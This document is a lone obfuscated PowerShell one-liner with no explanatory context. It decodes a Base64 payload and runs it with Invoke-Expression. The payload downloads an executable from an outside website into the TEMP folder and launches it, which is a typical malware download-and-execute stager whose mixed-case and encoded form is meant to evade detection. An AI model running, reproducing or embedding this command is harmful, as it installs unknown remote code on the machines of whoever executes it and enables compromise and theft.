iex([sYStEM.teXT.ENCoDIng]::uTf8.GetstriNG([SyStEM.ConvErt]::frOmbaSe64StrING('CihOZXctT2JqZWN0IHNZc3RFTS5ORVQud0VCY2xpZU5UKS5Eb1dubG9hREZpTGUoJ2h0dHA6Ly93d3cuYnJ5b256LmNvbS9lbW90aW9ucy9maWxlcy9sbndlLmV4ZScsIiRFbnY6VEVNUFxsbndlLmV4ZSIpO1N0YXJ0LVByb2Nlc3MgKCIkRW52OlRFTVBcbG53ZS5leGUiKQoK')));exit
